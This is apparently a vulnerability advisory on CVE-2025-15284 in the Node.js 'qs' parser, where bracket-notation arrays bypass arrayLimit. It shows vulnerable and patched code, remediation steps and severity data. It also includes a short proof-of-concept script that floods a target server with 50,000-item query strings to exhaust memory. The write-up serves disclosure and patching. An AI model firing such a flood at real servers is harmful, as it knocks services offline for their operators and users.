The `qs` library, used by Express and others to parse query strings, has a setting called `arrayLimit` to prevent memory exhaustion. Versions < 6.14.1 fail to apply this limit to bracket notation (`key[]=value`). Attackers can send a single request with thousands of keys to crash the server. Patch immediately to 6.14.1.
A logic flaw in the ubiquitous `qs` library allows attackers to bypass the `arrayLimit` security control using bracket notation. This enables unauthenticated Denial of Service (DoS) attacks against Node.js applications by exhausting server memory with massive arrays.
If you are a Node.js developer, you almost certainly use `qs`. It is the heavy-lifting query string parser sitting underneath giants like Express, NestJS, and Koa. It is responsible for turning `?user[name]=admin&user[role]=god` into the nice JSON objects you use in your controllers.
Because parsing user input is inherently dangerous, `qs` comes with built-in guardrails. The most critical one is `arrayLimit`, which defaults to 20. The logic is sound: if a user tries to send a query string with 10,000 array items, `qs` should stop them, either by treating the extra items as object keys or by truncating the array, preventing memory exhaustion.
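As a sketch of how that guard is meant to behave for explicit indices (simplified illustrative logic, not the actual `qs` source; `ARRAY_LIMIT` and `assignIndexed` are made-up names):

```javascript
// Illustrative sketch of an arrayLimit guard for explicit indices.
// ARRAY_LIMIT and assignIndexed are invented names, not qs internals.
const ARRAY_LIMIT = 20; // qs default

function assignIndexed(target, index, value) {
  if (index <= ARRAY_LIMIT) {
    // Small index: a bounded (possibly sparse) array is fine.
    const arr = Array.isArray(target) ? target : [];
    arr[index] = value;
    return arr;
  }
  // Oversized index: store it as a plain object key instead,
  // so a[99999]=x cannot force a 100,000-slot array allocation.
  const obj = Array.isArray(target) ? Object.assign({}, target) : (target || {});
  obj[index] = value;
  return obj;
}

console.log(Array.isArray(assignIndexed([], 3, 'x')));     // true
console.log(Array.isArray(assignIndexed([], 99999, 'x'))); // false
```

The key point is that an attacker-controlled index never dictates the size of an array allocation.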
CVE-2025-15284 is the realization that this guardrail was essentially a cardboard cutout. It looked intimidating to explicit indices like `a[100]=x`, but if you simply used the polite bracket notation `a[]=x`, the parser held the door open and let you allocate as much memory as you wanted. It is a classic case of "security by checking the wrong variable."
To understand the bug, you have to understand how qs handles arrays. It supports two main styles:
- Explicit indices: `arr[0]=a&arr[1]=b`
- Bracket (push) notation: `arr[]=a&arr[]=b`

The vulnerability lies in the inconsistency between these two handlers. When `qs` parsed an indexed value, it rigorously checked the index against `arrayLimit`. If you tried `arr[9999]=x`, it would politely refuse to create a sparse array of that size (or convert it to an object, depending on settings).
However, the handler for bracket notation was missing this check entirely. In `lib/parse.js`, when the parser encountered `[]`, it simply pushed the value onto the array accumulator without checking whether the array's length had already exceeded the configured limit. This effectively allowed an attacker to bypass the default limit of 20 and create arrays with 100,000+ elements, consuming megabytes of RAM per request.
The fix, applied in commit 3086902, is a perfect illustration of the oversight. The developers had to pipe the `arrayLimit` option all the way down into the `utils.combine` function, which handles the merging of values.
Before the patch, the code essentially did this (simplified):
```javascript
// Vulnerable Logic
if (isArray(target)) {
    target.push(value);
    return target;
}
```

The patch introduces a check to see if the array has grown too large. If it hits the limit, it converts the array structure into an object structure, which prevents the V8 engine from trying to allocate massive contiguous blocks of memory for arrays and allows `qs` to stop treating it as a growable list.
```javascript
// Patched Logic
if (Array.isArray(target) && target.length >= options.arrayLimit) {
    // Convert to object to stop array growth
    target = utils.toObject(target);
    target[Object.keys(target).length] = value;
    return target;
}
```

This forces the data structure to degrade gracefully rather than grow explosively.
Exploiting this is trivial and requires no authentication. The goal is to construct a payload that maximizes memory allocation. Since `qs` recursively parses nested objects, we can either go deep or go wide. The "wide" attack using `[]` is the vector here.
Here is a conceptual Proof of Concept (PoC) script:
```javascript
const axios = require('axios');

// Create a massive query string bypassing the default limit of 20
const payload = 'a[]=' + Array(50000).fill('junk').join('&a[]=');
console.log(`Payload size: ${(payload.length / 1024 / 1024).toFixed(2)} MB`);

// Fire off concurrent requests
for (let i = 0; i < 50; i++) {
  axios.get(`http://target-server.com/api?${payload}`)
    .catch(e => console.log('Request failed (server likely crashed)'));
}
```

When the server receives this, it attempts to construct an array of 50,000 strings for each request. In Node.js, these objects live on the heap. If the Garbage Collector (GC) cannot keep up with the allocation rate of incoming requests, the process hits the V8 heap limit (historically ~1.5 GB by default) and terminates with `FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed`.
You might think, "So what? I have auto-scaling." But DoS vulnerabilities like this are asymmetric. It takes an attacker milliseconds and kilobytes of bandwidth to generate a request that consumes seconds of CPU time and hundreds of megabytes of RAM on your server.
This is particularly dangerous for applications that echo or log the parsed query (e.g. `console.log(req.query)`): serializing a massive array can block the event loop even longer than the parsing itself.

Because `qs` is a deep dependency, you might not even know you are using it. It is likely buried inside your framework's body parser.
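Running `npm ls qs` will show every copy of `qs` in your dependency tree and which versions are installed. If a vulnerable version is pinned by a transitive dependency, one way to force the patched release (assuming npm 8.3+, which supports the `overrides` field; yarn and pnpm have equivalent `resolutions`/`overrides` mechanisms) is an override in `package.json`:

```json
{
  "overrides": {
    "qs": ">=6.14.1"
  }
}
```

After adding the override, reinstall and re-run `npm ls qs` to confirm every copy resolved to a fixed version.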
CVSS vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| qs (ljharb) | < 6.14.1 | 6.14.1 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-20 (Improper Input Validation) |
| Attack Vector | Network |
| CVSS | 7.5 (High) |
| Impact | Denial of Service (DoS) |
| Exploit Status | PoC Available |
| Fixed Version | 6.14.1 |